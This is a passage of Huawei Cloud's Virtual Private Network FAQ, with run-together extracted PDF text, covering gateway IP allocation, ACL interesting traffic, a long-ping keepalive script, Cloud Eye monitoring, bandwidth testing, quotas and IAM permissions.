● To avoid conflicts with cloud service addresses, do not use 127.0.0.0/8,169.254.0.0/16, 224.0.0.0/3 or 100.64.0.0/10 for your on-premises network.

10.6 How Is a VPN Gateway IP Address Allocated?The VPN gateway IP address of HUAWEI CLOUD is a group of IP addressesplanned before the VPN gateways are purchased. These IP addresses are presetwith VPN configurations.

When you buy a VPN gateway, the system randomly assigns an IP address andbinds it to the VPC you selected. This IP address can be bound to only one VPC.

The IP address of the VPN gateway has preset data. Therefore, it is notinterchangeable with an EIP, and you cannot specify an EIP as the VPN gateway IPaddress when you are buying the VPN gateway. The VPN gateway IP address canonly be assigned randomly from the preset VPN IP address pool. When a VPN

Virtual Private NetworkFAQ 10 Subnet Setting

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 79

gateway is deleted, the binding relationship between the gateway IP address andthe gateway VPC is released. When a new VPN gateway is purchased, the systemrandomly allocates a new gateway IP address.

Virtual Private NetworkFAQ 10 Subnet Setting

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 80

11 VPN Interesting Traffic

11.1 Do I Need to Configure ACL Rules on the HUAWEICLOUD Management Console After I Configured ACLRules on the Gateway Device of the On-premises DataCenter?

You need to create ACL rules dedicated for the gateway device of the on-premisesdata center and the ACL rules will be referenced by IPsec policies.

When you configure the VPN on the cloud, the ACL rules will be automaticallygenerated based on the local and remote subnets entered on the managementconsole and then delivered to the VPN gateway. The number of ACL rules isobtained by multiplying the number of local subnets and that of remote subnets.

11.2 How Do I Configure and Modify the InterestingTraffic of a VPN on the Cloud?

The interesting traffic is generated when the local subnet and remote subnetcommunicate with each other using the full mesh topology. For example, there aretwo local subnets A and B, and three remote subnets C, D, and E. The ACL rulesfor the interested traffic are as follows:

rule 1 permit ip source A destination Crule 2 permit ip source A destination Drule 3 permit ip source A destination Erule 4 permit ip source B destination Crule 5 permit ip source B destination Drule 6 permit ip source B destination E

If you modify the local subnet and remote subnet on the management console,the interesting traffic of the VPN device is automatically updated. That is, the ACLconfiguration on the cloud is modified.

Virtual Private NetworkFAQ 11 VPN Interesting Traffic

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 81

12 Keeping VPN Connection Alive

12.1 How Can I Prevent VPN Connection Interruption?VPN connections may be renegotiated when the IPsec SA lifecycle is about toexpire or the data transferred through the VPN connection exceeds 20 GB. Usually,renegotiation does not interrupt VPN connections.

Most disconnections are caused by incorrect configurations on both ends of theVPN connection or renegotiation fails due to Internet exceptions.

The common causes of connection interruptions are as follows:

● ACLs of the devices at the two ends of the VPN connection do not match.● SA lifecycles at the two ends of the VPN connection do not match.● DPD is not configured in the data center.● Configuration is modified when the VPN is used.● Packets are fragmented because the data size exceeds the MTU.● Jitter occurs on the carrier's network.

Therefore, ensure that the following configurations to keep the VPN connectionalive:

● Local and remote subnets are matched pairs.● SA lifecycles at the two ends of the VPN connection are consistent.● DPD is enabled on the gateway device of the data center, and the number of

detection times is greater than or equal to 5.● Parameters are modified at both ends of the VPN connection during the use

of the VPN connection.● Set TCP MAX-MSS to 1300 for the gateway device in the data center.● The bandwidth of the gateway in the data center is large enough to be used

by VPN.● VPN connection negotiation can be triggered by the two ends and the active

negotiation configuration of the gateway in the data center has beenenabled.

Virtual Private NetworkFAQ 12 Keeping VPN Connection Alive

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 82

● Run a long ping on the subnets at both ends. The script content is as follows:#!/bin/shhost=$1if [ -z $host ]; then echo "Usage: `basename $0` [HOST]" exit 1filog_name=$host".log"

while :; do result=`ping -W 1 -c 1 $host | grep 'bytes from '` if [ $? -gt 0 ]; then echo -e "`date +'%Y/%m/%d %H:%M:%S'` - host $host is down"| tee -a $log_name else echo -e "`date +'%Y/%m/%d %H:%M:%S'` - host $host is ok -`echo $result | cut -d ':' -f 2`"| tee -a $log_name fisleep 5 # avoid ping raindone#./ping.sh x.x.x.x >>/dev/null &

NO TE

1. Use the vi editor to copy the preceding script to the ping.sh file.2. Run the chmod 777 ping.sh command to grant permissions to the file.3. Run the ping command:

./ping.sh x.x.x.x >>/dev/null &x.x.x.x indicates the IP address to be pinged.

4. After the ping command is executed, the x.x.x.x.log file is generated. Run thefollowing command:tail -f x.x.x.x.logYou can view the long ping result in real time.

Virtual Private NetworkFAQ 12 Keeping VPN Connection Alive

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 83

13 Monitoring

13.1 Which VPN Resources Can Be Monitored?VPN Gateway

Bandwidth information that can be monitored includes inbound traffic, inboundbandwidth, outbound traffic, outbound bandwidth, and outbound bandwidthusage.

To view VPN gateway metrics, locate the target VPN gateway and click ViewMetric in the Operation column.

VPN Connection

The VPN connection status can be monitored.

Value 1 indicates that the connection is normal.

Value 0 indicates that the connection is not connected.

To view the VPN connection status, locate the target VPN connection and clickView Metric in the Operation column.

13.2 Will I Be Notified If a VPN Connection IsInterrupted?

The VPN connection status can be monitored. After a VPN connection is created,the VPN service reports the connection status information to Cloud Eye, but doesnot automatically send alarm notifications to you. To receive notifications, createalarm rules and enable Alarm Notifications on the Cloud Eye console.

After a VPN connection is created, you can locate the row that contains the VPNconnection and choose Operation > View Metric to view the VPN connectionstatus.

Virtual Private NetworkFAQ 13 Monitoring

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 84

Figure 13-1 View Metric

13.3 Can I View the Traffic of Each VPN Connection?No. VPN traffic monitoring is based on the VPN gateway. You can view theinbound and outbound traffic and bandwidth of the VPN gateway, but cannotview the traffic usage of a specific VPN connection.

13.4 Will I Be Notified When the VPN MonitoringResult Is Abnormal?

Yes.

You can configure to receive notification messages if abnormal VPN monitoringresults occur on the Simple Message Notification (SMN) and Cloud Eye consoles.

Configuring on the SMN Console1. Log in to the management console.

Under Management & Governance, select Simple Message Notification.

Virtual Private NetworkFAQ 13 Monitoring

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 85

Figure 13-2 Simple Message Notification

2. Choose Topic Management > Topics and click Create Topic to create a topic,for example, VPN-huaweicloud.

Figure 13-3 Creating a topic

3. Choose Topic Management > Subscriptions and click Add Subscription.

Select a topic, set Protocol to Email, and enter the email address for receivingthe message in the Endpoint box.

Virtual Private NetworkFAQ 13 Monitoring

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 86

Figure 13-4 Adding a subscription

NO TE

After the subscription is added, the system will send a confirmation email to youremail address. Confirm in your email.

Configuring on the Cloud Eye Console1. Log in to the management console.

Under Management & Governance, select Cloud Eye.

Figure 13-5 Cloud Eye

2. Create an alarm rule for the bandwidth usage of the VPN gateway.Enter the name, select Elastic IP and Bandwidth for Resource Type, setDimension to Bandwidths, Monitoring Scope to Specific resources andselect the target VPN gateway, set Method to Create manually, and AlarmPolicy to Outbound Bandwidth Usage, 5 consecutive periods, >, and 90. SetNotification Object to an SMN topic and use the default settings for otherparameters.

3. Create a VPN connection status alarm rule.

Virtual Private NetworkFAQ 13 Monitoring

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 87

The creation process is similar to that of bandwidth. Select Virtual PrivateNetwork for Resource Type, set Dimension to VPN connections,Monitoring Scope to Specific resources and select the target VPNconnection, set Method to Create manually, and Alarm Policy to VPNConnection Status, <, and 1. Set Notification Object to an SMN topic anduse the default settings for other parameters.

4. Create an alarm rule for monitoring IDC links.Create a website monitoring task, set Type to PING, URL to the gateway IPaddress of the customer data center, and retain the default settings for otherparameters. Create an alarm rule, select Website Monitoring for ResourceType, set Monitoring Scope to Specific resources and select the targetwebsite monitoring task, set Method to Create manually, and Alarm Policyto Available Monitoring Location Count, and configure other parameter asrequired. Set Notification Object to an SMN topic and use the defaultsettings for other parameters.

Figure 13-6 Creating an alarm rule

Virtual Private NetworkFAQ 13 Monitoring

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 88

14 Bandwidth and Network Speed

14.1 What Is the Actual VPN Connection NetworkSpeed?

A VPN connection has been created. Two ECSs have been created with one at thelocal side and the other at the remote side. The two ECSs can ping each other.

Perform the following steps to test the VPN gateway network speed if thebandwidth of your VPN gateway is 200 Mbit/s:

1. If the ECSs at the two sides of the VPN run Windows, use iPerf3 and FileZilla(a free FTP application for file uploading and downloading) to test thenetwork speed.

NO TE

The test shows that the average VPN network speed is 180 Mbit/s, and there is about10% network speed deviation. The TCP and FTP protocols have the congestion controlmechanism, and the IPsec protocol adds a new IP header. Therefore, about 10%network speed deviation is normal for the VPN network.

Figure 14-1 shows the result of the test performed using the iPerf3 client.

Figure 14-1 Test result for 200 Mbit/s bandwidth (iPerf3 client)

Virtual Private NetworkFAQ 14 Bandwidth and Network Speed

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 89

Figure 14-2 shows the result of the test performed using the iPerf3 server.

Figure 14-2 Test result for 200 Mbit/s bandwidth (iPerf3 server)

2. If the ECSs at the two sides of the VPN run CentOS 7, use iPerf3 to test thenetwork speed. The network speed can reach 180 Mbit/s.

3. If the ECS functioning as the server runs CentOS 7, and the ECS functioning asthe client runs Windows, use iPerf3 and FileZilla to test the network speed.The network speed is about 20 Mbit/s. The reason is that TCPimplementations on Windows and that on Linux are different, which causesthe slow network speed. Therefore, if the ECSs at the two sides of the VPNuse different OSs, the VPN network speed does not meet the bandwidthrequirements.Figure 14-3 shows the result of the test performed using iPerf3.

Figure 14-3 Test result when ECSs at the two sides run different OSs (iPerf3)

Perform the following steps to test the VPN gateway network speed if thebandwidth of your VPN gateway is 1,000 Mbit/s:

The VPN gateway bandwidth is shared by all of its VPN connections. If thebandwidth size is large, multiple ECSs are required to test the VPN gatewaybandwidth because the forwarding performance of each ECS is limited. Thisscenario has high requirements on ECS specifications. The ECSs used for testingmust have NICs that support bandwidth of 2 Gbit/s or higher.

Virtual Private NetworkFAQ 14 Bandwidth and Network Speed

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 90

The tests show that the actual VPN connection network speed on HUAWEICLOUD is within the normal range. However, the servers used at both sides ofthe VPN connection must run the OSs of the same type, and the server NICsmust meet the configuration requirements.

14.2 Which Direction of the Bandwidth Is Limited andWhat Is the Unit of the Bandwidth?

Your purchased VPN gateway bandwidth is used in the outbound direction. Tobalance the traffic in the inbound and outbound directions, the bandwidth in theinbound direction is limited.

● If the purchased bandwidth is less than or equal to 10 Mbit/s, the bandwidthin the inbound direction is limited to 10 Mbit/s.

● If the purchased bandwidth is more than 10 Mbit/s, the bandwidth in theinbound direction is the same as that of the purchased bandwidth.

The unit of bandwidth is Mbit/s and that of traffic is GB.

14.3 How Do I Change the VPN Bandwidth Size?1. On the VPN Gateways page, locate the row that contains the target VPN

gateway and choose More > Modify Bandwidth in the Operation column.2. On the Modify Bandwidth page, select your required bandwidth size.3. Click Submit.

14.4 What Happens If the Bandwidth of a VPNGateway Exceeds the Size Specified When I Create theGateway?

The bandwidth is used in the outbound direction of a VPC. If the bandwidthexceeds the size specified, network congestion will occur, some subnets cannot beaccessed, or even the VPN connection will be interrupted (the VPN detectionpackets cannot be received).

In this case, you are advised to increase the VPN gateway bandwidth size.

NO TE

The maximum bandwidth of a VPN connection is 300 Mbit/s.

14.5 Why Does the VPN Bandwidth Change Not TakeEffect?

There is a latency for the VPN bandwidth change to take effect.

Test the bandwidth 5 minutes after you change the bandwidth.

Virtual Private NetworkFAQ 14 Bandwidth and Network Speed

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 91

NO TE

Changing the VPN bandwidth will not interrupt workload running and networks.

14.6 Can a VPN Share Bandwidth with an EIP?No.

Currently, a public IP address is automatically generated and its bandwidth is setwhen you create a VPN gateway. The VPN cannot share bandwidth with an EIP.

14.7 What Are the Differences Between the Bandwidthof a VPN Connection and that of a Direct ConnectConnection?

Concepts● The bandwidth of a Direct Connect connection is the bandwidth of the

physical connection created by a user.● The VPN connection bandwidth refers to the bandwidth in the outbound

direction.

Bandwidth Size● The default maximum bandwidth of a Direct Connect connection is 1,000

Mbit/s. When you create a connection on the management console and setPort Type to 10GE single-mode optical port, the maximum bandwidth is 10Gbit/s.

● The maximum bandwidth of a VPN connection is 300 Mbit/s.

Network Quality● A Direct Connect user has a dedicated connection with high network quality.● VPN connections shared the bandwidth of their VPN gateway. The total

bandwidth of VPN connections cannot exceed the bandwidth of theirgateway. The network quality will be affected by the Internet quality.

14.8 How Do I Determine My VPN Bandwidth Size?Consider the following when you determine the bandwidth:

● Amount of data transmitted over a VPN tunnel in a period of time (Reserveenough bandwidth to prevent link congestion.)

● The egress bandwidth at the end of the VPN connection on the cloud must beless than that at the end of the VPN connection off the cloud.

Virtual Private NetworkFAQ 14 Bandwidth and Network Speed

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 92

15 Quotas

15.1 What Is the VPN Quota?

What Is Quota?Quotas can limit the number or amount of resources available to users, such asthe maximum number of ECSs or EVS disks that can be created.

If the existing resource quota cannot meet your service requirements, you canapply for a higher quota.

How Do I View My Quotas?1. Log in to the management console.

2. Click in the upper left corner and select the desired region and project.3. In the upper right corner of the page, choose Resources > My Quotas.

The Service Quota page is displayed.

Figure 15-1 My Quotas

4. View the used and total quota of each type of resources on the displayedpage.If a quota cannot meet service requirements, apply for a higher quota.

Virtual Private NetworkFAQ 15 Quotas

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 93

How Do I Apply for a Higher Quota?1. Log in to the management console.2. In the upper right corner of the page, choose Resources > My Quotas.

The Service Quota page is displayed.

Figure 15-2 My Quotas

3. Click Increase Quota.4. On the Create Service Ticket page, configure parameters as required.

In Problem Description area, fill in the content and reason for adjustment.5. After all necessary parameters are configured, select I have read and agree

to the Tenant Authorization Letter and Privacy Statement and clickSubmit.

15.2 How Many VPN Gateways and VPN ConnectionsCan I Create By Default?

By default, each user can create two VPN gateways and 12 VPN connections.Before purchasing VPN gateways, check your remaining quota. If the quota hasbeen reached, submit a service ticket to request for quota increase.

15.3 How Do I Change My VPN Gateway andConnection Quotas?

1. Log in to the management console. In the upper right corner of the page,choose Service Tickets > Create Service Ticket.

2. On the Create Service Ticket page, click Quotas in the Services area.3. Choose Quota Application under Select Subtype.4. Click Create Service Ticket.

Enter required information and click Submit.

Virtual Private NetworkFAQ 15 Quotas

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 94

15.4 How Many IPsec VPNs Can I Have?By default, a user can have a maximum of five IPsec VPNs. If the quota cannotfulfill your service requirements, request for quota increase.

Virtual Private NetworkFAQ 15 Quotas

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 95

16 Account Permissions

16.1 Are a Username and Password Required forCreating an IPsec VPN Connection?

No. HUAWEI CLOUD IPsec VPN uses a pre-shared key (PSK) for authentication.The key is configured on a VPN gateway. A tunnel will be established after VPNnegotiation is complete. Therefore, usernames and passwords are not required.

Generally, SSL, PPTP, and L2TP VPNs use usernames and passwords forauthentication.

NO TE

IPsec XAUTH is an extended technology of IPsec VPN. It prompts users to enter theirusernames and passwords during VPN negotiation.HUAWEI CLOUD VPN does not support IPsec XAUTH.

16.2 What Should I Do If the System Displays aMessage Indicating That I Do Not Have thePermissions to Create a VPN?

Check whether your account is an IAM user account. If yes, perform operations onthe IAM console as the HUAWEI CLOUD account user to authorize you the VPCoperation permissions. Ensure that your account has the VPC Administrator,Tenant Guest, and VPN Administrator permissions.

16.3 How Do I Determine that My Account CannotCreate a VPN Due to Insufficient Permissions?

● The VPN gateways and connections created by the HUAWEI CLOUD accountare invisible to the IAM user accounts.

● A message will be displayed indicating that the system is busy if you create aVPN gateway or connection using an IAM user account.

Virtual Private NetworkFAQ 16 Account Permissions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 96

For details about the permissions required for creating a VPN connection, seeWhat Should I Do If the System Displays a Message Indicating That I Do NotHave the Permissions to Create a VPN?

Virtual Private NetworkFAQ 16 Account Permissions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 97